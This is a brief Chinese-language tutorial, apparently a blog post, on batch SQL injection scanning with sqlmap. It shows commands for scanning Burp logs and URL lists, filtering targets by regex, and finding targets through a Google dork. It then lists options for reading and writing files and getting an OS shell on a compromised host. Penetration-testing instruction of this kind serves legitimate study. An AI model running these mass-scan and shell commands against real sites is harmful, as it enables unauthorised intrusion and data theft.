一.批量化掃描burp的請求日記
01.首先配置burp記錄所有的request請求,并保存在指定文件夾,如我保存在sqlmap目錄下名為sql.txt。
02.接著瀏覽器設置burp代理,訪問測試url,查看sql.txt。
3.使用sqlmap掃描
sqlmap.py -l sql.txt --batch -smart
Batch:會自動選擇yes
Smart:啟發式快速判斷,節約時間
偷懶的做法,最好不要--batch -samrt了,會錯過很多選項導致注入失敗。掃描結果可以到C:\Users\Administrator\.sqlmap\output去查看。
二.批量掃描文本中的多個目標
文本中保存url格式如下,sqlmap會一個個檢測。
sqlmap.py -m url.txt
三.利用正則過濾目標網址
為什么過濾目標網址,前面批量掃是讓我們掃描burp的請求耶,那這么多請求,有的請求并非是我們要掃描的網址怎么辦?用正則干掉他吧!!!
參數:--scope
例如:只想要www開頭,.com/.net/.org結尾的網址
python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
更多的看各位正則的功底啦。
四.利用谷歌批量掃
如首先用谷歌搜索.php?id=1結尾的URL,然后進行注入測試。
sqlmap.py -g "inurl:\".php?id=1\""
五.關于文件寫入與shell獲取
--sql-shell #執行指定sql命令
--sql-query #執行指定的sql語句
--file-read#讀取指定文件
--file-write #寫入本地文件
(--file-write /test/test.txt --file-dest /var/www/html/1.txt;將本地的test.txt文件寫入到目標的1.txt)
--file-dest #要寫入的文件絕對路徑
--os-cmd=id#執行系統命令
--os-shell #系統交互shell
--reg-read#讀取win系統注冊表
六.總結
此次主要介紹批量化掃描的幾個方式,關于文件寫入和shell獲取,由于我實驗環境權限存在問題,所以只是簡單的列出命令,希望小伙伴有執行成功的能夠告訴斗哥一聲啊。好了,sqlmap系列基本也就要告一個段落了,而sqlmap本身還有很多的東西值得我們學習,雖然分成了4個系列,但是只是說如何使用這個工具罷了,還有很多奇淫巧技斗哥也還沒有get到,有機會大家一起討論吧。
